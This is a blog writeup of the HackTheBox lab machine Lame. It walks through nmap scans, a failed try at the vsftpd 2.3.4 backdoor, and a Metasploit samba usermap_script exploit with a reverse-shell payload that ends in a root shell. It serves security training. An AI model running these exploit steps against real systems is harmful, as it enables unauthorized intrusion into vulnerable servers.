Booj thoughts on security

HackTheBox - Lame

This writeup details attacking the machine Lame ( on HackTheBox.


First things first, as with any machine, we want to nmap scan it to see what ports are open.

root@kali:~/ nmap -p- -T4

Nmap scan report for
Host is up (0.062s latency).
Not shown: 65530 filtered ports
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Nmap done: 1 IP address (1 host up) scanned in 437.65 seconds

So we have a bunch of ports open, the next step is to perform a more in depth scan on these ports.

root@kali:~/ nmap -p 21,22,139,445,3632 -A

Starting Nmap 7.25BETA1 ( ) at 2017-08-21 12:21 BST
Nmap scan report for
Host is up (0.17s latency).
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%), Linux 2.6.27 - 2.6.28 (92%), Linux 2.6.8 - 2.6.30 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2017-08-18T03:23:21-04:00

TRACEROUTE (using port 22/tcp)
1   168.26 ms
2   251.04 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 90.89 seconds

THe first target that looks like it would be exploitable is the ftp server version, vsftpd 2.3.4. For those who don’t know, this version of vsftpd was compromised, not via the source code, but by an exploitable version being uploaded to the master site. Exploiting it is as simple as sending a smiley-face ‘:)’ as the username credential. This will then open a shell on port 6200.

However, a quick and dirty test reveals that this method doesn’t work.

root@kali:~# ftp
Connected to
220 (vsFTPd 2.3.4)
Name ( :)
331 Please specify the password.
530 Login incorrect.
Login failed.
ftp> exit
221 Goodbye.
root@kali:~# nmap -p 6200

Starting Nmap 7.25BETA1 ( ) at 2017-08-21 12:26 BST
Nmap scan report for
Host is up (0.037s latency).
6200/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 0.83 seconds

Since there was no fix to the source code, fixing this vulnerability didn’t necessitate a version change. This was just placed as a red-herring.

So with that failing lets attempt to attack the samba service. We can see from the namp scan that it’s running version 3.0.20, so lets check metasploit to see if anything pops up.

msf > search samba
[!] Module database cache not built yet, using slow search

Matching Modules

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/rsync/modules_list                             normal     List Rsync Modules
   auxiliary/scanner/smb/smb_uninit_cred                            normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/fileformat/ms14_060_sandworm    2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   exploit/windows/smb/group_policy_startup        2015-01-26       manual     Group Policy Script Execution From Shared Resource
   post/linux/gather/enum_configs                                   normal     Linux Gather Configurations

Quite a few exploits for samba, but doing some research reveals that samba/usermap_script targets versions 3.0.20 through 3.0.25rc3. So lets try that one.

msf > use exploit/multi/samba/usermap_script 
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set RHOST
msf exploit(usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST

msf exploit(usermap_script) > exploit

[*] Started reverse TCP double handler on 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo g2J1cK9h6SBFE0RL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "g2J1cK9h6SBFE0RL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2017-05-17 17:31:24 +0100

It works and we have a root shell.

comments powered by Disqus